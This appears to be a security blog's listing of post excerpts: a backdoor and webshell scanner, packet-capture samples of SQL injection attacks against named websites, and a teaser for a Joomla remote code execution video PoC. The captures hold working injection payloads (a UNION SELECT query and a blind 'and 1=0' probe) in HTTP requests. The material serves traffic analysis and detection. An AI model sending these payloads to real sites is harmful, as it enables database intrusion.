Syhunt Web Backdoor Scanner .LUA or .EXE – Easy Customization and Configuration

So I found this neat little script lying around; it makes looking for backdoors and webshells on webservers a cakewalk. Backdoors are always changing, and different hacker groups rename common backdoors, so you can update this script with new intel in two seconds. To add a new filename to search, simply add /newfilename in …

Capsule Sticker Remote SQL Injection Vulnerability SQLi Exploit PCAP Traffic Sample

Download Capsule Sticker SQL Injection PCAP : stickersqli

2009-01-01 09:30:19.647159 PPPoE [ses 0x976] IP 117.195.143.198.2131 > 203.146.140.17.80: Flags [P.], seq 1:820, ack 1, win 65535, length 819: HTTP: GET /homenew//sticker/sticker.php?id=1%27+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/* HTTP/1.1
.. v.].!E..[..@…..u……..S.P.r,e….P…N’..GET /homenew//sticker/sticker.php?id=1%27+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/* HTTP/1.1
Host: www.musicza.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-gb,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: …

Active Business Directory v2 Remote Blind SQL Injection Attack Exploit Traffic PCAP

2009-01-01 09:36:59.374040 PPPoE [ses 0x976] IP 117.195.143.198.2308 > 208.106.128.136.80: Flags [P.], seq 1:438, ack 1, win 65535, length 437: HTTP: GET /demoactivebusinessdirectory/default.asp?catid=0+and+1=0 HTTP/1.1
.. v…!E…W?@…K_u….j.. ..PJ..(f).tP…….GET /demoactivebusinessdirectory/default.asp?catid=0+and+1=0 HTTP/1.1
Host: www.activewebsoftwares.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-gb,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
2009-01-01 09:37:00.221949 …

Shell Upload RCE (CVE-2015-8562) Joomla 3.4.6 – 5.6.13 Vulnerable to Attack – Video PoC

A critical remote code execution (RCE) vulnerability was discovered in Joomla! websites. This is making a lot of noise for the following reasons: it appears that attackers started exploiting this even before the disclosure (0-day); it is very easy to exploit this vulnerability; almost all the versions of Joomla are vulnerable under certain conditions. At …

Active Business Directory v2 Remote Blind SQL Injection Attack Exploit Traffic PCAP

Download Active Business Directory Remote Blind SQL Injection PCAP : remoteblindsql.pcap

2009-01-01 09:36:59.374040 PPPoE [ses 0x976] IP 117.195.143.198.2308 > 208.106.128.136.80: Flags [P.], seq 1:438, ack 1, win 65535, length 437: HTTP: GET /demoactivebusinessdirectory/default.asp?catid=0+and+1=0 HTTP/1.1
.. v…!E…W?@…K_u….j.. ..PJ..(f).tP…….GET /demoactivebusinessdirectory/default.asp?catid=0+and+1=0 HTTP/1.1
Host: www.activewebsoftwares.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 …